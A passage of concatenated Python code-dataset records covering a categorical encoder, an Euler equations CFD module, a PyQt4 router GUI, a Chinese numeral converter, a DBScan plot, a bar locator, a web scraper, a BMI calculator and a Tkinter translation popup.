prob_df['Ratio'].to_dict() \r\n \r\n if self.strategy == 'WOE_Encoding':\r\n for i in self.variables:\r\n df[i].fillna('Missing',inplace=True)\r\n per_df = pd.DataFrame(pd.crosstab(df[i], df[self.Target_Var], normalize='columns').mul(100))\r\n per_df.rename(columns={0: \"Target_0_Per\", 1: \"Target_1_Per\"},inplace=True)\r\n per_df['WOE'] = np.log(per_df['Target_1_Per']/per_df['Target_0_Per'])\r\n value = per_df['WOE'].to_dict() \r\n self.param_dict_Col[i]= value\r\n \r\n return self\r\n \r\n \r\n \r\n def transform(self,df):\r\n if self.strategy =='OneHot':\r\n for key,value in self.param_dict_Col.items():\r\n for a in value:\r\n column = key + \"_\" + a\r\n df[column] = np.where(df[key] == a,1,0) \r\n \r\n if self.strategy == 'Ratio_Encoding':\r\n for var in self.param_dict_Col:\r\n df[str(var) +\"_Encoded\"] = df[var].map(self.param_dict_Col[var] ) \r\n \r\n if self.strategy == 'WOE_Encoding':\r\n for var in self.param_dict_Col:\r\n df[str(var) +\"_WOE_Encoded\"] = df[var].map(self.param_dict_[var])\r\n \r\n return df \r\n \r\n","sub_path":"fast_ml/feature_engineering_categorical.py","file_name":"feature_engineering_categorical.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"404412496","text":"# -*- coding: utf-8 -*-\n\"\"\"\n The ``base`` module of modelphy library\n =========================\n \n Provides ...\n \n :Example:\n \n >>> import hades.aero.Isentropic as Is\n >>> Is.TiTs_Mach(1.)\n 1.2\n >>> Is.TiTs_Mach(2., gamma=1.6)\n 2.2\n \n Available functions\n -------------------\n \n Provides ...\n \"\"\"\n\nimport numpy as np\nimport math\nimport flowdyn.modelphy.base as mbase\n\n# ===============================================================\ndef _vecmag(qdata):\n return np.sqrt(np.sum(qdata**2, axis=0))\n\ndef _vecsqrmag(qdata):\n return np.sum(qdata**2, axis=0)\n\ndef _sca_mult_vec(r, v):\n return r*v # direct multiplication thanks to shape (:)*(2,:)\n\ndef _vec_dot_vec(v1, v2):\n return np.einsum('ij,ij->j', v1, v2) \n\ndef datavector(ux, uy, uz=None):\n return np.vstack([ux, uy]) if not uz else np.vstack([ux, uy, uz])\n\n# ===============================================================\n# implementation of MODEL class\n\nclass base(mbase.model):\n \"\"\"\n Class model for euler equations\n\n attributes:\n\n \"\"\"\n def __init__(self, gamma=1.4, source=None):\n mbase.model.__init__(self, name='euler', neq=3)\n self.islinear = 0\n self.shape = [1, 1, 1]\n self.gamma = gamma\n self.source = source\n \n def cons2prim(self, qdata): # qdata[ieq][cell] :\n \"\"\"\n >>> model().cons2prim([[5.], [10.], [20.]])\n True\n \"\"\"\n rho = qdata[0]\n u = qdata[1]/qdata[0]\n p = self.pressure(qdata)\n pdata = [ rho, u ,p ] \n return pdata \n\n def prim2cons(self, pdata): # qdata[ieq][cell] :\n \"\"\"\n >>> model().prim2cons([[2.], [4.], [10.]]) == [[2.], [8.], [41.]]\n True\n \"\"\"\n V2 = pdata[1]**2 if pdata[1].ndim==1 else _vecsqrmag(pdata[1])\n rhoe = pdata[2]/(self.gamma-1.) + .5*pdata[0]*V2\n return [ pdata[0], _sca_mult_vec(pdata[0], pdata[1]), rhoe ]\n\n def density(self, qdata):\n return qdata[0].copy()\n\n def pressure(self, qdata): # returns (gam-1)*( rho.et) - .5 * (rho.u)**2 / rho )\n return (self.gamma-1.0)*(qdata[2]-self.kinetic_energy(qdata))\n\n def velocity(self, qdata): # returns (rho u)/rho, works for both scalar and vector\n return qdata[1]/qdata[0]\n\n def velocitymag(self, qdata): # returns mag(rho u)/rho, depending if scalar or vector\n return np.abs(qdata[1])/qdata[0] if qdata[1].ndim==1 else _vecmag(qdata[1])/qdata[0]\n\n def kinetic_energy(self, qdata): \n \"\"\"volumic kinetic energy\"\"\"\n return .5*qdata[1]**2/qdata[0] if qdata[1].ndim==1 else .5*_vecsqrmag(qdata[1])/qdata[0]\n\n def mach(self, qdata):\n return qdata[1]/np.sqrt(self.gamma*((self.gamma-1.0)*(qdata[0]*qdata[2]-0.5*qdata[1]**2)))\n\n def entropy(self, qdata): # S/r\n return np.log(self.pressure(qdata)/qdata[0]**self.gamma)/(self.gamma-1.)\n\n def enthalpy(self, qdata): \n return (qdata[2]-0.5*qdata[1]**2/qdata[0])*self.gamma/qdata[0]\n\n def ptot(self, qdata):\n gm1 = self.gamma-1.\n return self.pressure(qdata)*(1.+.5*gm1*self.mach(qdata)**2)**(self.gamma/gm1)\n\n def htot(self, qdata):\n ec = 0.5*qdata[1]**2/qdata[0]\n return ((qdata[2]-ec)*self.gamma + ec)/qdata[0]\n\n def numflux(self, name, pdataL, pdataR, dir=None):\n if name==None: name='hllc'\n return (self._numfluxdict[name])(pdataL, pdataR, dir)\n\n def numflux_centeredflux(self, pdataL, pdataR, dir=None): # centered flux ; pL[ieq][face]\n gam = self.gamma\n gam1 = gam-1.\n\n rhoL = pdataL[0]\n uL = unL = pdataL[1]\n pL = pdataL[2]\n rhoR = pdataR[0]\n uR = unR = pdataR[1]\n pR = pdataR[2]\n\n cL2 = gam*pL/rhoL\n cR2 = gam*pR/rhoR\n HL = cL2/gam1 + 0.5*uL**2\n HR = cR2/gam1 + 0.5*uR**2\n\n # final flux\n Frho = .5*( rhoL*unL + rhoR*unR )\n Frhou = .5*( (rhoL*unL**2 + pL) + (rhoR*unR**2 + pR))\n FrhoE = .5*( (rhoL*unL*HL) + (rhoR*unR*HR))\n\n return [Frho, Frhou, FrhoE]\n\n def numflux_centeredmassflow(self, pdataL, pdataR, dir=None): # centered flux ; pL[ieq][face]\n gam = self.gamma\n gam1 = gam-1.\n\n rhoL = pdataL[0]\n uL = unL = pdataL[1]\n pL = pdataL[2]\n rhoR = pdataR[0]\n uR = unR = pdataR[1]\n pR = pdataR[2]\n\n cL2 = gam*pL/rhoL\n cR2 = gam*pR/rhoR\n HL = cL2/gam1 + 0.5*uL**2\n HR = cR2/gam1 + 0.5*uR**2\n\n # final flux\n Frho = .5*( rhoL*unL + rhoR*unR )\n Frhou = .5*( Frho*(unL+unR) + pL + pR)\n FrhoE = .5*Frho*( HL + HR)\n\n return [Frho, Frhou, FrhoE]\n\n\n def numflux_hlle(self, pdataL, pdataR, dir=None): # HLLE Riemann solver ; pL[ieq][face]\n\n gam = self.gamma\n gam1 = gam-1.\n\n rhoL = pdataL[0]\n uL = unL = pdataL[1]\n pL = pdataL[2]\n rhoR = pdataR[0]\n uR = unR = pdataR[1]\n pR = pdataR[2]\n\n cL2 = gam*pL/rhoL\n cR2 = gam*pR/rhoR\n HL = cL2/gam1 + 0.5*uL**2\n HR = cR2/gam1 + 0.5*uR**2\n\n # The HLLE Riemann solver\n \n # sorry for using little \"e\" here - is is not just internal energy\n eL = HL-pL/rhoL\n eR = HR-pR/rhoR\n\n # Roe's averaging\n Rrho = np.sqrt(rhoR/rhoL)\n #\n tmp = 1.0/(1.0+Rrho);\n velRoe = tmp*(uL + uR*Rrho)\n uRoe = tmp*(uL + uR*Rrho)\n hRoe = tmp*(HL + HR*Rrho)\n\n gamPdivRho = tmp*( (cL2+0.5*gam1*uL*uL) + (cR2+0.5*gam1*uR*uR)*Rrho )\n cRoe = np.sqrt(gamPdivRho - gam1*0.5*velRoe**2)\n\n # max HLL 2 waves \"velocities\"\n sL = np.minimum(0., np.minimum(uRoe-cRoe, unL-np.sqrt(cL2)))\n sR = np.maximum(0., np.maximum(uRoe+cRoe, unR+np.sqrt(cR2)))\n\n # final flux\n Frho = (sR*rhoL*unL - sL*rhoR*unR + sL*sR*(rhoR-rhoL))/(sR-sL)\n Frhou = (sR*(rhoL*unL**2 + pL) - sL*(rhoR*unR**2 + pR) + sL*sR*(rhoR*unR-rhoL*unL))/(sR-sL)\n FrhoE = (sR*(rhoL*unL*HL) - sL*(rhoR*unR*HR) + sL*sR*(rhoR*eR-rhoL*eL))/(sR-sL)\n\n return [Frho, Frhou, FrhoE]\n\n def numflux_hllc(self, pdataL, pdataR, dir=None): # HLLC Riemann solver ; pL[ieq][face]\n\n gam = self.gamma\n gam1 = gam-1.\n\n rhoL = pdataL[0]\n uL = unL = pdataL[1]\n pL = pdataL[2]\n rhoR = pdataR[0]\n uR = unR = pdataR[1]\n pR = pdataR[2]\n\n cL2 = gam*pL/rhoL\n cR2 = gam*pR/rhoR\n\n # the enthalpy is assumed to include ke ...!\n HL = cL2/gam1 + 0.5*uL**2\n HR = cR2/gam1 + 0.5*uR**2\n\n # The HLLC Riemann solver\n \n # sorry for using little \"e\" here - is is not just internal energy\n eL = HL-pL/rhoL\n eR = HR-pR/rhoR\n\n # Roe's averaging\n Rrho = np.sqrt(rhoR/rhoL)\n\n tmp = 1.0/(1.0+Rrho);\n velRoe = tmp*(uL + uR*Rrho)\n uRoe = tmp*(uL + uR*Rrho)\n hRoe = tmp*(HL + HR*Rrho)\n\n gamPdivRho = tmp*( (cL2+0.5*gam1*uL*uL) + (cR2+0.5*gam1*uR*uR)*Rrho )\n cRoe = np.sqrt(gamPdivRho - gam1*0.5*velRoe**2)\n\n # speed of sound at L and R\n sL = np.minimum(uRoe-cRoe, unL-np.sqrt(cL2))\n sR = np.maximum(uRoe+cRoe, unR+np.sqrt(cR2))\n\n # speed of contact surface\n sM = (pL-pR-rhoL*unL*(sL-unL)+rhoR*unR*(sR-unR))/(rhoR*(sR-unR)-rhoL*(sL-unL))\n\n # pressure at right and left (pR=pL) side of contact surface\n pStar = rhoR*(unR-sR)*(unR-sM)+pR\n\n # should not be computed if totally upwind\n SmoSSm = np.where(sM >= 0.,\n sM/(sL-sM),\n sM/(sR-sM))\n SmUoSSm = np.where(sM >= 0.,\n (sL-unL)/(sL-sM),\n (sR-unR)/(sR-sM))\n\n Frho = np.where(sM >= 0.,\n np.where(sL >= 0.,\n rhoL*unL,\n rhoL*sM*SmUoSSm),\n np.where(sR <= 0.,\n rhoR*unR,\n rhoR*sM*SmUoSSm))\n\n Frhou = np.where(sM >= 0.,\n np.where(sL >= 0.,\n Frho*uL+pL,\n Frho*uL + (pStar-pL)*SmoSSm + pStar),\n np.where(sR <= 0.,\n Frho*uR+pR,\n Frho*uR + (pStar-pR)*SmoSSm + pStar) )\n\n FrhoE = np.where(sM >= 0.,\n np.where(sL >= 0.,\n rhoL*HL*unL,\n Frho*eL + (pStar*sM-pL*unL)*SmoSSm + pStar*sM),\n np.where(sR <= 0.,\n rhoR*HR*unR,\n Frho*eR + (pStar*sM-pR*unR)*SmoSSm + pStar*sM))\n\n return [Frho, Frhou, FrhoE]\n\n def timestep(self, data, dx, condition):\n \"computation of timestep: data(=pdata) is not used, dx is an array of cell sizes, condition is the CFL number\"\n # dt = CFL * dx / ( |u| + c )\n # dt = np.zeros(len(dx)) #test use zeros instead\n #dt = condition*dx/ (data[1] + np.sqrt(self.gamma*data[2]/data[0]) )\n Vmag = self.velocitymag(data)\n dt = condition*dx / ( Vmag + np.sqrt(self.gamma*(self.gamma-1.0)*(data[2]/data[0]-0.5*Vmag**2) ))\n return dt\n\n\n# ===============================================================\n# implementation of euler 1D class\n\nclass euler1d(base):\n \"\"\"\n Class model for 2D euler equations\n \"\"\"\n def __init__(self, gamma=1.4, source=None):\n base.__init__(self, gamma=gamma, source=source)\n self.shape = [1, 1, 1]\n self._vardict = { 'pressure': self.pressure, 'density': self.density,\n 'velocity': self.velocity, 'mach': self.mach, 'enthalpy': self.enthalpy,\n 'entropy': self.entropy, 'ptot': self.ptot, 'htot': self.htot }\n self._bcdict.update({'sym': self.bc_sym,\n 'insub': self.bc_insub,\n 'insup': self.bc_insup,\n 'outsub': self.bc_outsub,\n 'outsup': self.bc_outsup })\n self._numfluxdict = { 'hllc': self.numflux_hllc, 'hlle': self.numflux_hlle, \n 'centered': self.numflux_centeredflux, 'centeredmassflow': self.numflux_centeredmassflow }\n\n def _derived_fromprim(self, pdata, dir):\n \"\"\"\n returns rho, un, V, c2, H\n 'dir' is ignored\n \"\"\"\n c2 = self.gamma * pdata[2] / pdata[0]\n H = c2/(self.gamma-1.) + .5*pdata[1]**2\n return pdata[0], pdata[1], pdata[1], c2, H\n\n def bc_sym(self, dir, data, param):\n \"symmetry boundary condition, for inviscid equations, it is equivalent to a wall, do not need user parameters\"\n return [ data[0], -data[1], data[2] ]\n\n def bc_insub(self, dir, data, param):\n g = self.gamma\n gmu = g-1.\n p = data[2]\n m2 = np.maximum(0., ((param['ptot']/p)**(gmu/g)-1.)*2./gmu)\n rh = param['ptot']/param['rttot']/(1.+.5*gmu*m2)**(1./gmu)\n return [ rh, -dir*np.sqrt(g*m2*p/rh), p ] \n\n def bc_insup(self, dir, data, param):\n # expected parameters are 'ptot', 'rttot' and 'p'\n g = self.gamma\n gmu = g-1.\n m2 = np.maximum(0., ((param['ptot']/param['p'])**(gmu/g)-1.)*2./gmu)\n rh = param['ptot']/param['rttot']/(1.+.5*gmu*m2)**(1./gmu)\n return param\n\n def bc_outsub(self, dir, data, param):\n return [ data[0], data[1], param['p'] ] \n\n def bc_outsup(self, dir, data, param):\n return data\n\nclass model(euler1d): # backward compatibility\n pass\n\n# ===============================================================\n# implementation of derived MODEL class\n\nclass nozzle(euler1d):\n \"\"\"\n Class nozzle for euler equations with section term -1/A dA/dx (rho u, rho u2, rho u Ht)\n\n attributes:\n\n \"\"\"\n def __init__(self, sectionlaw, gamma=1.4):\n euler1d.__init__(self, gamma=gamma, source=[ self.src_mass, self.src_mom, self.src_energy ])\n self.sectionlaw = sectionlaw\n \n def initdisc(self, mesh):\n self.geomterm = 1./self.sectionlaw(mesh.centers())* \\\n (self.sectionlaw(mesh.xf[1:mesh.ncell+1])-self.sectionlaw(mesh.xf[0:mesh.ncell])) / \\\n (mesh.xf[1:mesh.ncell+1]-mesh.xf[0:mesh.ncell])\n return \n\n def src_mass(self, x, qdata):\n return -self.geomterm * qdata[1]\n\n def src_mom(self, x, qdata):\n return -self.geomterm * qdata[1]**2/qdata[0]\n\n def src_energy(self, x, qdata):\n ec = 0.5*qdata[1]**2/qdata[0]\n return -self.geomterm * qdata[1] * ((qdata[2]-ec)*self.gamma + ec)/qdata[0]\n\n# ===============================================================\n# implementation of euler 2D class\n\nclass euler2d(base):\n \"\"\"\n Class model for 2D euler equations\n \"\"\"\n def __init__(self, gamma=1.4, source=None):\n base.__init__(self, gamma=gamma, source=source)\n self.shape = [1, 2, 1]\n self._vardict = { 'pressure': self.pressure, 'density': self.density,\n 'velocity': self.velocity, 'velocity_x': self.velocity_x, 'velocity_y': self.velocity_y,\n 'mach': self.mach, 'enthalpy': self.enthalpy,\n 'entropy': self.entropy, 'ptot': self.ptot, 'htot': self.htot }\n self._bcdict.update({ #'sym': self.bc_sym,\n # 'insub': self.bc_insub,\n # 'insup': self.bc_insup,\n # 'outsub': self.bc_outsub,\n # 'outsup': self.bc_outsup \n })\n self._numfluxdict = { #'hllc': self.numflux_hllc, 'hlle': self.numflux_hlle, \n 'centered': self.numflux_centeredflux }\n\n def _derived_fromprim(self, pdata, dir):\n \"\"\"\n returns rho, un, V, c2, H\n 'dir' is ignored\n \"\"\"\n c2 = self.gamma * pdata[2] / pdata[0]\n un = _vec_dot_vec(pdata[1], dir) \n H = c2/(self.gamma-1.) + .5*_vecmag(pdata[1])\n return pdata[0], un, pdata[1], pdata[2], H, c2\n\n def velocity_x(self, qdata): # returns (rho ux)/rho\n return qdata[1][0,:]/qdata[0]\n\n def velocity_y(self, qdata): # returns (rho uy)/rho\n return qdata[1][1,:]/qdata[0]\n\n def mach(self, qdata):\n rhoUmag = _vecmag(qdata[1])\n return rhoUmag/np.sqrt(self.gamma*((self.gamma-1.0)*(qdata[0]*qdata[2]-0.5*rhoUmag**2)))\n\n def numflux_centeredflux(self, pdataL, pdataR, dir): # centered flux ; pL[ieq][face]\n gam = self.gamma\n gam1 = gam-1.\n\n rhoL, unL, VL, pL, HL, cL2 = self._derived_fromprim(pdataL, dir)\n rhoR, unR, VR, pR, HR, cR2 = self._derived_fromprim(pdataR, dir)\n \n # final flux\n Frho = .5*( rhoL*unL + rhoR*unR )\n Frhou = .5*( (rhoL*unL)*VL + pL*dir + (rhoR*unR)*VR + pR*dir)\n FrhoE = .5*( (rhoL*unL*HL) + (rhoR*unR*HR))\n\n return [Frho, Frhou, FrhoE]\n\n# ===============================================================\n# automatic testing\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n\n","sub_path":"flowdyn/modelphy/euler.py","file_name":"euler.py","file_ext":"py","file_size_in_byte":15048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"578649685","text":"#!/usr/bin/env python \n#coding:utf-8\n\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nimport utility\nfrom APIRos import ApiRos,TrafficApiRos\n\n\nfrom mainLeftControl import TWMainUiLeft\n# from mainBottomRightCtl import TWMainUiBottomRight\nfrom mainTopRightControl import TWMainUiTopRight\n\n\nclass TWMainUi(QMainWindow):\n\n\tdef __init__(self, loginControl,rosApi,sIp,sPort,sUser,sPwd):\n\t\tsuper(TWMainUi, self).__init__()\n\t\tself.loginControl = loginControl\n\t\tself.rosApi = rosApi\n\t\tself.sIp,self.sPort,self.sUser,self.sPwd = sIp,sPort,sUser,sPwd\n\t\tself.twInitUi()\n\t\tself.setWindowFlags(Qt.WindowMinimizeButtonHint) # PyQT禁止窗口最大化按钮:\n\t\tscreen = QDesktopWidget().screenGeometry()\n\t\tself.setFixedSize(screen.width(),screen.height()) # PyQT禁止调整窗口大小:\n\t\t# self.setFixedSize(self.width(), self.height()) # PyQT禁止调整窗口大小:\n\t\tself.setWindowTitle(self.tr(self.sIp + \":\" + self.sPort + \"|\" + self.sUser))\n\n\tdef twInitUi(self):\n\t\tvboxRoot = QVBoxLayout()\n\t\t#中间部分\n\t\thbox = QHBoxLayout()\n\t\t#中间 左边\n\t\tself.leftMainCtl = TWMainUiLeft(self, self.rosApi)\n\t\thbox.addWidget(self.leftMainCtl)\n\t\t#中间 右边\n\t\tvboxRight = QVBoxLayout()\n\n\t\trightTop = QWidget(self)\n\t\t# rightTop.setStyleSheet(\"QWidget{background-color:#F00}\")\n\t\tself.rightMid = TWMainUiTopRight(self, self.leftMainCtl, self.rosApi)\n\t\trightBottom = QWidget(self)\n\n\t\tvboxRight.addWidget(rightTop)\n\t\tvboxRight.addWidget(self.rightMid)\n\t\tvboxRight.addWidget(rightBottom)\n\n\t\tvboxRight.setStretchFactor(rightTop,1)\n\t\tvboxRight.setStretchFactor(self.rightMid,1)\n\t\tvboxRight.setStretchFactor(rightBottom,1)\n\n\t\t#底部\n\t\thbox.addLayout(vboxRight)\n\t\tvboxRoot.addLayout(hbox)\n\n\t\thbox.setStretchFactor(self.leftMainCtl, 1)\n\t\thbox.setStretchFactor(vboxRight, 4)\n\n\t\tvboxRoot.setStretchFactor(hbox, 97)\n\n\t\tw = QWidget(self)\n\t\tw.setStyleSheet(\"QWidget{background-color:#4ABDE0}\")\n\t\tw.setLayout(vboxRoot)\n\t\tself.setCentralWidget(w)\n\t\t# self.statusBar().showMessage(self.tr(self.sIp + \":\" + self.sPort + \"|\" + self.sUser))\n\t\tlogo=QWidget(self)\n\n\t\tscreen = QDesktopWidget().screenGeometry()\n\t\tiWidth = screen.width()\n\t\tif iWidth <=1024:\n\t\t\tlogo.setGeometry(0, 0, 256, 85)\n\t\telif iWidth <=1366:\n\t\t\tlogo.setGeometry(0, 0, 341, 113)\n\t\telif iWidth <= 1600:\n\t\t\tlogo.setGeometry(0, 0, 400, 133)\n\t\telse:\n\t\t\tlogo.setGeometry(0, 0, 400, 133)\n\t\ts = \"QWidget{background-image:url(./images/%s);background-repeat:no-repeat;background-position:center;}\"%utility.getBackGroundName()\n\t\tlogo.setStyleSheet(s)\n\n\t# def closeEvent(self, event):\n\t# \tif self.loginControl.removeMainUI(self):\n\t# \t\tevent.accept()\n\t# \t\t#子控件可在这里添加\n\t# \t\tself.rightMid.twHideAllChild()\n\t# \telse:\n\t# \t\tprint \"remove error\"\n\t\n\tdef show(self):\n\t\tutility.twHalfScreenSize(self) \n\t\tQWidget.show(self)\n\n\tdef setRightModel(self,twModel):\n\t\tself.rightMid.setRightModel(twModel)\n\n\tdef setRightTitle(self,sText):\n\t\tself.rightMid.twsetTitleInfo(sText)\n\n\tdef login(self):\n\t\tself.rosApi.setLoginParams(self.sIp,self.sPort,self.sUser,self.sPwd)\n\t\tself.rosApi.login()\n\t\tself.show()\n\n\tdef newTWTrafficApi(self):\n\t\tapiRos = TrafficApiRos()\n\t\tapiRos.setLoginParams(self.sIp,self.sPort,self.sUser,self.sPwd)\n\t\tapiRos.login()\n\t\treturn apiRos\n\n\tdef close(self):\n\t\tsuper(TWMainUi, self).close()\n\t\tself.rightMid.hide()\n\n","sub_path":"TWControl/mainControl.py","file_name":"mainControl.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"247946145","text":"def convert(num):\n if num == 0: return \"零\"\n digit2word = [\"零\", \"一\", \"二\", \"三\", \"四\", \"五\", \"六\", \"七\", \"八\", \"九\"]\n unit1 = [\"\", \"万\", \"亿\"]\n unit2 = [\"\", \"十\", \"百\", \"千\"]\n \n unit1_idx = 0\n ss = \"\"\n while num > 0:\n four_digit = [] # 个 十 百 千\n # 从右向左 每次取四位数\n for _ in range(4):\n if num == 0: break\n temp = num%10\n num = int(num/10)\n four_digit.append(temp)\n \n def convert_four(four_digit):\n result = \"\"\n for i in range(len(four_digit)):\n if result == \"\" and four_digit[i] == 0: continue #忽略零\n if result != \"\" and four_digit[i] == 0 and four_digit[i-1] == 0: continue #多个零相连,只读一个\n\n if i == 1 and four_digit[i] == 1 and i == len(four_digit) - 1:\n #十位的时候,如果是1,不读一十,而只读十,如11读十一而非一十一,但111又读成一百一十一,所以要看当前i是不是最大的一位\n result = unit2[i] + result\n elif four_digit[i] == 0: #0不要单位\n result = digit2word[four_digit[i]] + result\n else:\n result = digit2word[four_digit[i]] + unit2[i] + result\n return result\n \n #以四位为一组\n ss = convert_four(four_digit) + unit1[unit1_idx] + ss \n unit1_idx += 1\n\n return ss\n\nprint(convert(12001))\nfor i in range(99999):\n print(i)\n print(convert(i))\n","sub_path":"练习/数字转中文读音.py","file_name":"数字转中文读音.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"84985649","text":"import os\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport pylab\n\nfrom Method.LoadedPath import LoadedPath\nfrom Method.DataTransfer import DataTransfer\n\n\nclass Scatter2:\n\n def __init__(self):\n self.org_node = LoadedPath.get_org_node()\n self.latitude, self.longitude = DataTransfer.node_transform(self.org_node)\n\n def scatter2(self, data, num=0):\n plt.figure(figsize=(12, 8), dpi=100)\n plt.subplot(111)\n np.random.seed(19680801)\n random_color = np.random.rand(len(data), 3)\n for cluster, color in zip(data, random_color):\n longitude, latitude = [], []\n for e in cluster:\n longitude.append(self.longitude[int(e)])\n latitude.append(self.latitude[int(e)])\n if len(cluster) > 1:\n plt.scatter(latitude, longitude, marker='o', c=color)\n else:\n plt.scatter(latitude, longitude, marker='X', c='black', s=120)\n\n plt.title(str(num) + '_DBScan Scatter2', fontsize=12)\n plt.xlabel('x', fontsize=12)\n plt.ylabel('y', fontsize=12)\n\n rel_path = \"../data/easy_oldenburg/DBScan_scatter.png\"\n abs_path = os.path.join(os.path.dirname(__file__), rel_path)\n # plt.savefig(abs_path, dpi=300)\n plt.savefig('C:\\\\Users\\\\yuren\\\\Desktop\\\\DBScan\\\\Cluster\\\\' + str(num) + '_cluster.png')\n plt.show()\n","sub_path":"Graph/Scatter2.py","file_name":"Scatter2.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"470148849","text":"import json\nimport sys\nimport os\n\n\ndef load_from_json(filepath):\n with open(filepath, 'r') as file_handler:\n return json.load(file_handler)\n\n\ndef get_biggest_bar(bar_data):\n biggest_bar = max(bar_data['features'], key=lambda x:\n x['properties']['Attributes']['SeatsCount'])\n biggest_bar_seats = biggest_bar['properties']['Attributes']['SeatsCount']\n biggest_bar_data = [biggest_bar['properties']['Attributes']['Name'],\n biggest_bar['properties']['Attributes']['Address'],\n 'Мест:' + str(biggest_bar_seats)]\n return biggest_bar_data\n\n\ndef get_smallest_bar(bar_data):\n smallest_bar = min(bar_data['features'], key=lambda x:\n x['properties']['Attributes']['SeatsCount'])\n smallest_bar_seats = smallest_bar['properties']['Attributes']['SeatsCount']\n smallest_bar_data = [smallest_bar['properties']['Attributes']['Name'],\n smallest_bar['properties']['Attributes']['Address'],\n 'Мест:'+str(smallest_bar_seats)]\n return smallest_bar_data\n\n\ndef get_closest_bar(bar_data, longitude, latitude):\n closest_bar = min(bar_data['features'], key=lambda x:\n (x['geometry']['coordinates'][0] - longitude)**2 +\n (x['geometry']['coordinates'][1] - latitude)**2)\n closest_bar_seats = closest_bar['properties']['Attributes']['SeatsCount']\n closest_bar_data = [closest_bar['properties']['Attributes']['Name'],\n closest_bar['properties']['Attributes']['Address'],\n 'Мест:'+str(closest_bar_seats)]\n return closest_bar_data\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Error: define file path')\n print('Usage example: python pprint_json.py ')\n else:\n if os.path.isfile(sys.argv[1]):\n bar_data = load_from_json(sys.argv[1])\n longitude = float(input('Your longitude: '))\n latitude = float(input('Your latitude: '))\n biggest_bar = get_biggest_bar(bar_data)\n smallest_bar = get_smallest_bar(bar_data)\n closest_bar = get_closest_bar(bar_data, longitude, latitude)\n print('Biggest bar: \\n' + '\\n'.join(biggest_bar) + '\\n')\n print('Smallest bar: \\n' + '\\n'.join(smallest_bar) + '\\n')\n print('Closest bar: \\n' + '\\n'.join(closest_bar))\n\n else:\n print('Error: No such file in directory')\n","sub_path":"bars.py","file_name":"bars.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"38723096","text":"from bs4 import BeautifulSoup # BeautifulSoup4 package\r\nfrom urllib.request import urlopen\r\nimport os\r\n\r\n# Grab the HTML from a web page just like we did\r\n# in the first example\r\nmy_address = \"http://www.example.com\"\r\nhtml_page = urlopen(my_address)\r\nhtml_text = html_page.read()\r\n\r\n# Pass the HTML to the BeautifulSoup constructor.\r\n# The second argument tells beautifulsoup which parser to use\r\nsoup = BeautifulSoup(html_text, \"lxml\")\r\n\r\nresult = soup.get_text()\r\ntext = os.linesep.join([s for s in result.splitlines() if s])\r\n\r\nprint(text)\r\n","sub_path":"beautiful_soup.py","file_name":"beautiful_soup.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"619550011","text":"#Pedro Cortés Soberanes A01374919\n#Función: Calcular IMC y calcular estado\n\n#Calcular IMC\ndef calcularIMC (peso,estatura):\n imc = (peso)/((estatura)*(estatura))\n\n return imc\n\n#Calcular estado con base en el IMC\ndef calcularEstado (imc):\n if imc<18.5:\n x = (\"Bajo Peso\")\n if imc>=18.5 and imc<=25:\n x = (\"Peso Normal\")\n if imc>25:\n x = (\"Sobrepeso\")\n return x\n\n\ndef main():\n pesoKg = float(input(\"Teclea tu peso en kilogramos: \"))\n estaturaM = float(input(\"Teclea tu estatura en metros: \"))\n imc = calcularIMC(pesoKg,estaturaM)\n print(\" -Tu IMC es de: %.2f \" % imc)\n estado = calcularEstado(imc)\n print(\" -Tu estado es de: \" ,estado)\n\n\nmain()","sub_path":"IMC.py","file_name":"IMC.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"197092100","text":"from tkinter import Tk, Scrollbar, Text, VERTICAL, RIGHT, LEFT, BOTH, END, Y, FLAT, DISABLED, WORD\nfrom tkinter.font import Font\nimport keyboard\n\nfrom conf import Conf\n\nPOPUP_MAX_WIDTH = 700\nPOPUP_MAX_HEIGHT = 400\nPADDING = 20\n\nclass Popup:\n def __init__(self, org_text, translated_text, is_uicontrol_label):\n self.org_text = org_text\n self.translated_text = translated_text\n self.is_uicontrol_label = is_uicontrol_label\n self.displayed_text = ''\n self.conf = Conf.get_instance()\n self.popup = None\n self.text_widget = None\n self.font = None\n\n def show(self):\n self.__create_popup_window()\n self.__create_font_widget()\n self.__create_text_widget()\n self.__set_popup_size_and_pos()\n self.__set_evenbinding()\n self.__set_focus()\n\n self.popup.mainloop()\n\n def __create_popup_window(self):\n # Create a popup (= the root/master window) and set its properties\n self.popup = Tk()\n self.popup.title('Popup Translator')\n self.popup.attributes('-topmost', True) # Always on top\n self.popup.attributes('-toolwindow', True) # No icon on taskbar, no icon on menu, no min button, no max button\n self.popup.configure(bg=self.conf.get_popup_bkcolor())\n\n # Scrollbar\n vbar = Scrollbar(self.popup, orient=VERTICAL)\n vbar.pack(side=RIGHT, fill=Y)\n # FIXME: Scrollbar works with mouse wheel, but doesn't work with mouse click\n # Note: We don't need a horizontial scrollbar because out-of-width text is automatically wrapped\n # hbar = Scrollbar(self.popup, orient=HORIZONTAL)\n # hbar.pack(side=BOTTOM, fill=X)\n\n def __create_text_widget(self):\n # Choose text to display on popup\n if self.is_uicontrol_label:\n self.displayed_text = self.org_text + '\\n' + '===\\n' + self.translated_text\n else:\n self.displayed_text = self.translated_text\n\n # Add text to popup\n self.text_widget = Text(self.popup)\n self.text_widget.insert(END, 